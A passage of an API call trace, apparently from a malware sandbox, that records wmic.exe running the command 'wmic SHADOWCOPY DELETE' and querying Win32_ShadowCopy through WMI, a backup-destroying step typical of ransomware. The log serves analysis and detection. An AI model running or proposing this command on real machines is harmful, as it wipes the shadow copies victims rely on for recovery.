0x33096c8 [0142.522] free (_Block=0x33096c8) [0142.522] malloc (_Size=0xc) returned 0x33096c8 [0142.522] malloc (_Size=0xc) returned 0x330abf0 [0142.522] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0142.522] SysStringLen (param_1="TABLE") returned 0x5 [0142.522] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0142.522] SysStringLen (param_1="VALUE") returned 0x5 [0142.522] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0142.522] SysStringLen (param_1="XML") returned 0x3 [0142.522] SysStringLen (param_1="XML") returned 0x3 [0142.522] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0142.522] malloc (_Size=0x18) returned 0x3302a50 [0142.522] malloc (_Size=0xc) returned 0x330a980 [0142.522] free (_Block=0x330a980) [0142.523] malloc (_Size=0xc) returned 0x330aae8 [0142.523] malloc (_Size=0xc) returned 0x330a968 [0142.523] SysStringLen (param_1="texttablewsys") returned 0xd [0142.523] SysStringLen (param_1="TABLE") returned 0x5 [0142.523] SysStringLen (param_1="texttablewsys") returned 0xd [0142.523] SysStringLen (param_1="XML") returned 0x3 [0142.523] SysStringLen (param_1="texttablewsys") returned 0xd [0142.523] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0142.523] SysStringLen (param_1="XML") returned 0x3 [0142.523] SysStringLen (param_1="texttablewsys") returned 0xd [0142.523] malloc (_Size=0x18) returned 0x3302a90 [0142.523] malloc (_Size=0xc) returned 0x330aad0 [0142.523] free (_Block=0x330aad0) [0142.523] malloc (_Size=0xc) returned 0x330ab30 [0142.523] malloc (_Size=0xc) returned 0x330ab18 [0142.523] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0142.523] SysStringLen (param_1="TABLE") returned 0x5 [0142.524] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0142.524] SysStringLen (param_1="XML") returned 0x3 [0142.524] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0142.524] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0142.524] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0142.524] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0142.524] malloc (_Size=0x18) returned 0x3302ab0 [0142.524] malloc (_Size=0xc) returned 0x330a9e0 [0142.524] free (_Block=0x330a9e0) [0142.524] malloc (_Size=0xc) returned 0x330ab48 [0142.524] malloc (_Size=0xc) returned 0x330aad0 [0142.524] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0142.524] SysStringLen (param_1="TABLE") returned 0x5 [0142.524] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0142.524] SysStringLen (param_1="XML") returned 0x3 [0142.524] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0142.524] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0142.524] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0142.524] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0142.524] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0142.525] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0142.525] malloc (_Size=0x18) returned 0x3302b10 [0142.525] malloc (_Size=0xc) returned 0x330ab00 [0142.525] free (_Block=0x330ab00) [0142.525] malloc (_Size=0xc) returned 0x330aa40 [0142.525] malloc (_Size=0xc) returned 0x330ab78 [0142.525] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0142.525] SysStringLen (param_1="TABLE") returned 0x5 [0142.525] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0142.525] SysStringLen (param_1="XML") returned 0x3 [0142.525] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0142.525] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0142.525] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0142.525] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0142.525] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0142.525] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0142.525] malloc (_Size=0x18) returned 0x33028b0 [0142.526] malloc (_Size=0xc) returned 0x330a998 [0142.526] free (_Block=0x330a998) [0142.526] malloc (_Size=0xc) returned 0x330ab60 [0142.526] malloc (_Size=0xc) returned 0x330a950 [0142.526] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0142.526] SysStringLen (param_1="TABLE") returned 0x5 [0142.526] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0142.526] SysStringLen (param_1="XML") returned 0x3 [0142.526] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0142.526] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0142.526] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0142.526] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0142.526] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0142.526] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0142.526] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0142.526] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0142.526] malloc (_Size=0x18) returned 0x3302890 [0142.527] malloc (_Size=0xc) returned 0x330aa10 [0142.527] free (_Block=0x330aa10) [0142.527] malloc (_Size=0xc) returned 0x330aa58 [0142.527] malloc (_Size=0xc) returned 0x330a998 [0142.527] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0142.527] SysStringLen (param_1="TABLE") returned 0x5 [0142.527] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0142.527] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0142.527] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0142.527] SysStringLen (param_1="XML") returned 0x3 [0142.527] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0142.527] SysStringLen (param_1="texttablewsys") returned 0xd [0142.527] SysStringLen (param_1="XML") returned 0x3 [0142.527] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0142.527] malloc (_Size=0x18) returned 0x3302c10 [0142.528] malloc (_Size=0xc) returned 0x330ab90 [0142.528] free (_Block=0x330ab90) [0142.528] malloc (_Size=0xc) returned 0x330a9f8 [0142.528] malloc (_Size=0xc) returned 0x330ab00 [0142.528] SysStringLen (param_1="htable-sortby") returned 0xd [0142.528] SysStringLen (param_1="TABLE") returned 0x5 [0142.528] SysStringLen (param_1="htable-sortby") returned 0xd [0142.528] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0142.528] SysStringLen (param_1="htable-sortby") returned 0xd [0142.528] SysStringLen (param_1="XML") returned 0x3 [0142.528] SysStringLen (param_1="htable-sortby") returned 0xd [0142.528] SysStringLen (param_1="texttablewsys") returned 0xd [0142.528] SysStringLen (param_1="htable-sortby") returned 0xd [0142.528] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0142.528] SysStringLen (param_1="XML") returned 0x3 [0142.528] SysStringLen (param_1="htable-sortby") returned 0xd [0142.528] malloc (_Size=0x18) returned 0x33028d0 [0142.528] malloc (_Size=0xc) returned 0x330a9c8 [0142.529] free (_Block=0x330a9c8) [0142.529] malloc (_Size=0xc) returned 0x330a980 [0142.529] malloc (_Size=0xc) returned 0x330aba8 [0142.529] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0142.529] SysStringLen (param_1="TABLE") returned 0x5 [0142.529] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0142.529] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0142.529] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0142.529] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0142.529] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0142.529] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0142.529] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0142.529] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0142.529] malloc (_Size=0x18) returned 0x3302ad0 [0142.529] malloc (_Size=0xc) returned 0x330aa70 [0142.529] free (_Block=0x330aa70) [0142.530] malloc (_Size=0xc) returned 0x330ab90 [0142.530] malloc (_Size=0xc) returned 0x330a9b0 [0142.530] SysStringLen (param_1="wmiclimofformat") returned 0xf [0142.530] SysStringLen (param_1="TABLE") returned 0x5 [0142.530] SysStringLen (param_1="wmiclimofformat") returned 0xf [0142.530] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0142.530] SysStringLen (param_1="wmiclimofformat") returned 0xf [0142.530] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0142.530] SysStringLen (param_1="wmiclimofformat") returned 0xf [0142.530] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0142.530] SysStringLen (param_1="wmiclimofformat") returned 0xf [0142.530] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0142.530] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0142.530] SysStringLen (param_1="wmiclimofformat") returned 0xf [0142.530] malloc (_Size=0x18) returned 0x3302af0 [0142.530] malloc (_Size=0xc) returned 0x330abc0 [0142.530] free (_Block=0x330abc0) [0142.530] malloc (_Size=0xc) returned 0x330aa10 [0142.531] malloc (_Size=0xc) returned 0x330abc0 [0142.531] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0142.531] SysStringLen (param_1="TABLE") returned 0x5 [0142.531] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0142.531] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0142.531] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0142.531] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0142.531] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0142.531] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0142.531] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0142.531] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0142.531] malloc (_Size=0x18) returned 0x3302910 [0142.531] malloc (_Size=0xc) returned 0x330aa28 [0142.531] free (_Block=0x330aa28) [0142.531] malloc (_Size=0xc) returned 0x330a908 [0142.531] malloc (_Size=0xc) returned 0x330aa70 [0142.531] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0142.532] SysStringLen (param_1="TABLE") returned 0x5 [0142.532] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0142.532] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0142.532] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0142.532] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0142.532] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0142.532] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0142.532] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0142.532] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0142.532] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0142.532] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0142.532] malloc (_Size=0x18) returned 0x33028f0 [0142.532] FreeThreadedDOMDocument:IUnknown:Release (This=0x37b45a8) returned 0x0 [0142.532] free (_Block=0x33095a8) [0142.532] GetCommandLineW () returned="wmic SHADOWCOPY DELETE " [0142.532] malloc (_Size=0x40) returned 0x330ace0 [0142.533] memcpy_s (in: _Destination=0x330ace0, _DestinationSize=0x3e, _Source=0x30e1af8, _SourceSize=0x30 | out: _Destination=0x330ace0) returned 0x0 [0142.533] malloc (_Size=0xc) returned 0x330a9c8 [0142.533] malloc (_Size=0xc) returned 0x330a920 [0142.533] malloc (_Size=0xc) returned 0x330a9e0 [0142.533] malloc (_Size=0xc) returned 0x330a938 [0142.533] malloc (_Size=0x80) returned 0x330ad28 [0142.533] GetLocalTime (in: lpSystemTime=0x2d0f6e0 | out: lpSystemTime=0x2d0f6e0*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0x1c, wHour=0xd, wMinute=0x35, wSecond=0x1d, wMilliseconds=0xf6)) [0142.533] _vsnwprintf (in: _Buffer=0x330ad28, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x2d0f6c0 | out: _Buffer="10-28-2020T13:53:29") returned 19 [0142.533] lstrlenW (lpString=" SHADOWCOPY DELETE ") returned 20 [0142.533] malloc (_Size=0x2a) returned 0x3300568 [0142.533] lstrlenW (lpString=" SHADOWCOPY DELETE ") returned 20 [0142.533] lstrlenW (lpString=" SHADOWCOPY DELETE ") returned 20 [0142.533] malloc (_Size=0x2a) returned 0x330adb0 [0142.533] lstrlenW (lpString=" SHADOWCOPY DELETE ") returned 20 [0142.533] lstrlenW (lpString=" SHADOWCOPY DELETE ") returned 20 [0142.533] lstrlenW (lpString=" SHADOWCOPY DELETE ") returned 20 [0142.533] malloc (_Size=0x16) returned 0x3302b70 [0142.533] lstrlenW (lpString="SHADOWCOPY") returned 10 [0142.533] _wcsicmp (_String1="SHADOWCOPY", _String2="\"NULL\"") returned 81 [0142.533] malloc (_Size=0x16) returned 0x3302b30 [0142.533] malloc (_Size=0x4) returned 0x330ade8 [0142.533] free (_Block=0x0) [0142.533] free (_Block=0x3302b70) [0142.534] lstrlenW (lpString=" SHADOWCOPY DELETE ") returned 20 [0142.534] malloc (_Size=0xe) returned 0x330aaa0 [0142.534] lstrlenW (lpString="DELETE") returned 6 [0142.534] _wcsicmp (_String1="DELETE", _String2="\"NULL\"") returned 66 [0142.534] malloc (_Size=0xe) returned 0x330abd8 [0142.534] malloc (_Size=0x8) returned 0x330adf8 [0142.534] memmove_s (in: _Destination=0x330adf8, _DestinationSize=0x4, _Source=0x330ade8, _SourceSize=0x4 | out: _Destination=0x330adf8) returned 0x0 [0142.534] free (_Block=0x330ade8) [0142.534] free (_Block=0x0) [0142.534] free (_Block=0x330aaa0) [0142.534] lstrlenW (lpString=" SHADOWCOPY DELETE ") returned 20 [0142.534] malloc (_Size=0x8) returned 0x330ade8 [0142.534] lstrlenW (lpString="QUIT") returned 4 [0142.534] lstrlenW (lpString="SHADOWCOPY") returned 10 [0142.534] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0142.534] lstrlenW (lpString="EXIT") returned 4 [0142.534] lstrlenW (lpString="SHADOWCOPY") returned 10 [0142.534] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0142.534] free (_Block=0x330ade8) [0142.534] WbemLocator:IUnknown:AddRef (This=0x30f3d70) returned 0x2 [0142.534] malloc (_Size=0x8) returned 0x330ade8 [0142.534] lstrlenW (lpString="/") returned 1 [0142.534] lstrlenW (lpString="SHADOWCOPY") returned 10 [0142.534] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0142.534] lstrlenW (lpString="-") returned 1 [0142.534] lstrlenW (lpString="SHADOWCOPY") returned 10 [0142.534] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0142.534] lstrlenW (lpString="CLASS") returned 5 [0142.534] lstrlenW (lpString="SHADOWCOPY") returned 10 [0142.534] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0142.534] lstrlenW (lpString="PATH") returned 4 [0142.534] lstrlenW (lpString="SHADOWCOPY") returned 10 [0142.534] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0142.535] lstrlenW (lpString="CONTEXT") returned 7 [0142.535] lstrlenW (lpString="SHADOWCOPY") returned 10 [0142.535] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0142.535] lstrlenW (lpString="SHADOWCOPY") returned 10 [0142.535] malloc (_Size=0x16) returned 0x33029b0 [0142.535] lstrlenW (lpString="SHADOWCOPY") returned 10 [0142.535] GetCurrentThreadId () returned 0xafc [0142.535] ??0CHString@@QAE@XZ () returned 0x2d0f638 [0142.535] malloc (_Size=0xc) returned 0x330aa28 [0142.535] malloc (_Size=0xc) returned 0x330aa88 [0142.535] WbemLocator:IWbemLocator:ConnectServer (in: This=0x30f3d70, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x138540 | out: ppNamespace=0x138540*=0x30faf20) returned 0x0 [0148.613] free (_Block=0x330aa88) [0148.613] free (_Block=0x330aa28) [0148.613] CoSetProxyBlanket (pProxy=0x30faf20, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0148.613] ??1CHString@@QAE@XZ () returned 0x732365f8 [0148.613] GetCurrentThreadId () returned 0xafc [0148.613] ??0CHString@@QAE@XZ () returned 0x2d0f5dc [0148.613] malloc (_Size=0xc) returned 0x330aa28 [0148.613] malloc (_Size=0xc) returned 0x330aa88 [0148.614] malloc (_Size=0xc) returned 0x330aaa0 [0148.614] malloc (_Size=0xc) returned 0x330aab8 [0148.614] SysStringLen (param_1="root\\cli") returned 0x8 [0148.614] SysStringLen (param_1="\\") returned 0x1 [0148.614] malloc (_Size=0xc) returned 0x330ac50 [0148.614] SysStringLen (param_1="root\\cli\\") returned 0x9 [0148.614] SysStringLen (param_1="ms_409") returned 0x6 [0148.614] free (_Block=0x330aab8) [0148.614] free (_Block=0x330aaa0) [0148.614] free (_Block=0x330aa88) [0148.614] free (_Block=0x330aa28) [0148.614] malloc (_Size=0xc) returned 0x330aa28 [0148.614] WbemLocator:IWbemLocator:ConnectServer (in: This=0x30f3d70, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x138544 | out: ppNamespace=0x138544*=0x312a0e0) returned 0x0 [0151.312] free (_Block=0x330aa28) [0151.312] free (_Block=0x330ac50) [0151.312] ??1CHString@@QAE@XZ () returned 0x732365f8 [0151.313] GetCurrentThreadId () returned 0xafc [0151.313] ??0CHString@@QAE@XZ () returned 0x2d0f638 [0151.313] malloc (_Size=0xc) returned 0x330ac80 [0151.313] malloc (_Size=0xc) returned 0x330acc8 [0151.313] malloc (_Size=0xc) returned 0x330ac08 [0151.313] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0151.313] malloc (_Size=0x3a) returned 0x330b578 [0151.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf14a8, cbMultiByte=-1, lpWideCharStr=0x330b578, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0151.313] free (_Block=0x330b578) [0151.313] malloc (_Size=0xc) returned 0x330ac20 [0151.313] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0151.313] SysStringLen (param_1="SHADOWCOPY") returned 0xa [0151.313] malloc (_Size=0xc) returned 0x330ac50 [0151.313] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SHADOWCOPY") returned 0x26 [0151.313] SysStringLen (param_1="'") returned 0x1 [0151.314] free (_Block=0x330ac20) [0151.314] free (_Block=0x330ac08) [0151.314] free (_Block=0x330acc8) [0151.314] free (_Block=0x330ac80) [0151.314] IWbemServices:GetObject (in: This=0x30faf20, strObjectPath="MSFT_CliAlias.FriendlyName='SHADOWCOPY'", lFlags=0, pCtx=0x0, ppObject=0x2d0f634*=0x0, ppCallResult=0x0 | out: ppObject=0x2d0f634*=0x3137380, ppCallResult=0x0) returned 0x0 [0151.357] malloc (_Size=0xc) returned 0x330ac80 [0151.357] IWbemClassObject:Get (in: This=0x3137380, wszName="Target", lFlags=0, pVal=0x2d0f60c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2d0f60c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0151.358] free (_Block=0x330ac80) [0151.358] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0151.358] malloc (_Size=0x3e) returned 0x330b578 [0151.358] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0151.358] malloc (_Size=0xc) returned 0x330acc8 [0151.358] IWbemClassObject:Get (in: This=0x3137380, wszName="PWhere", lFlags=0, pVal=0x2d0f60c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2d0f60c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0151.358] free (_Block=0x330acc8) [0151.358] lstrlenW (lpString=" Where ID = '#'") returned 15 [0151.358] malloc (_Size=0x20) returned 0x330b5c0 [0151.358] lstrlenW (lpString=" Where ID = '#'") returned 15 [0151.358] malloc (_Size=0xc) returned 0x330ac98 [0151.358] IWbemClassObject:Get (in: This=0x3137380, wszName="Connection", lFlags=0, pVal=0x2d0f60c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2d0f60c*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3137518, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0151.359] free (_Block=0x330ac98) [0151.359] IUnknown:QueryInterface (in: This=0x3137518, riid=0xf6a04*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x2d0f628 | out: ppvObject=0x2d0f628*=0x3137518) returned 0x0 [0151.359] GetCurrentThreadId () returned 0xafc [0151.359] ??0CHString@@QAE@XZ () returned 0x2d0f5a4 [0151.359] malloc (_Size=0xc) returned 0x330ac80 [0151.359] IWbemClassObject:Get (in: This=0x3137518, wszName="Namespace", lFlags=0, pVal=0x2d0f58c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2d0f58c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0151.359] free (_Block=0x330ac80) [0151.359] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0151.359] malloc (_Size=0x16) returned 0x3302990 [0151.359] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0151.359] malloc (_Size=0xc) returned 0x330ac80 [0151.359] IWbemClassObject:Get (in: This=0x3137518, wszName="Locale", lFlags=0, pVal=0x2d0f58c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x311eb6c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2d0f58c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0151.359] free (_Block=0x330ac80) [0151.359] lstrlenW (lpString="ms_409") returned 6 [0151.359] malloc (_Size=0xe) returned 0x330ac08 [0151.359] lstrlenW (lpString="ms_409") returned 6 [0151.359] malloc (_Size=0xc) returned 0x330ac20 [0151.359] IWbemClassObject:Get (in: This=0x3137518, wszName="User", lFlags=0, pVal=0x2d0f58c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x311eb6c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2d0f58c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0151.360] free (_Block=0x330ac20) [0151.360] malloc (_Size=0xc) returned 0x330ac80 [0151.360] IWbemClassObject:Get (in: This=0x3137518, wszName="Password", lFlags=0, pVal=0x2d0f58c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2d0f58c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0151.360] free (_Block=0x330ac80) [0151.360] malloc (_Size=0xc) returned 0x330acc8 [0151.360] IWbemClassObject:Get (in: This=0x3137518, wszName="Server", lFlags=0, pVal=0x2d0f58c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2d0f58c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0151.360] free (_Block=0x330acc8) [0151.360] lstrlenW (lpString=".") returned 1 [0151.360] malloc (_Size=0x4) returned 0x330b5e8 [0151.360] lstrlenW (lpString=".") returned 1 [0151.360] malloc (_Size=0xc) returned 0x330acc8 [0151.360] IWbemClassObject:Get (in: This=0x3137518, wszName="Authority", lFlags=0, pVal=0x2d0f58c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x311eb6c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2d0f58c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0151.360] free (_Block=0x330acc8) [0151.360] ??1CHString@@QAE@XZ () returned 0x732365f8 [0151.360] IUnknown:Release (This=0x3137518) returned 0x1 [0151.360] GetCurrentThreadId () returned 0xafc [0151.361] ??0CHString@@QAE@XZ () returned 0x2d0f598 [0151.361] malloc (_Size=0xc) returned 0x330ac20 [0151.361] IWbemClassObject:Get (in: This=0x3137380, wszName="__RELPATH", lFlags=0, pVal=0x2d0f580*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2d0f580*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0151.361] free (_Block=0x330ac20) [0151.361] malloc (_Size=0xc) returned 0x330ac98 [0151.361] GetCurrentThreadId () returned 0xafc [0151.361] ??0CHString@@QAE@XZ () returned 0x2d0f514 [0151.361] ??0CHString@@QAE@PBG@Z () returned 0x2d0f508 [0151.361] ??0CHString@@QAE@ABV0@@Z () returned 0x2d0f490 [0151.361] ?Empty@CHString@@QAEXXZ () returned 0x732365f8 [0151.361] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x330b5f8 [0151.361] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0151.361] ?Left@CHString@@QBE?AV1@H@Z () returned 0x2d0f488 [0151.361] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x2d0f48c [0151.361] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x2d0f508 [0151.361] ??1CHString@@QAE@XZ () returned 0x1 [0151.361] ??1CHString@@QAE@XZ () returned 0x1 [0151.361] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x2d0f484 [0151.361] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x2d0f490 [0151.361] ??1CHString@@QAE@XZ () returned 0x1 [0151.361] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x330b660 [0151.361] ?Find@CHString@@QBEHPBG@Z () returned 0xa [0151.361] ?Left@CHString@@QBE?AV1@H@Z () returned 0x2d0f488 [0151.361] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x2d0f48c [0151.362] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x2d0f508 [0151.362] ??1CHString@@QAE@XZ () returned 0x1 [0151.362] ??1CHString@@QAE@XZ () returned 0x1 [0151.362] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x2d0f484 [0151.362] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x2d0f490 [0151.362] ??1CHString@@QAE@XZ () returned 0x732365f8 [0151.362] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x732365ec [0151.362] ??1CHString@@QAE@XZ () returned 0x732365f8 [0151.362] malloc (_Size=0xc) returned 0x330acb0 [0151.362] malloc (_Size=0xc) returned 0x330acc8 [0151.362] malloc (_Size=0xc) returned 0x330ac20 [0151.362] malloc (_Size=0xc) returned 0x330ac38 [0151.362] malloc (_Size=0xc) returned 0x330ac68 [0151.362] SysStringLen 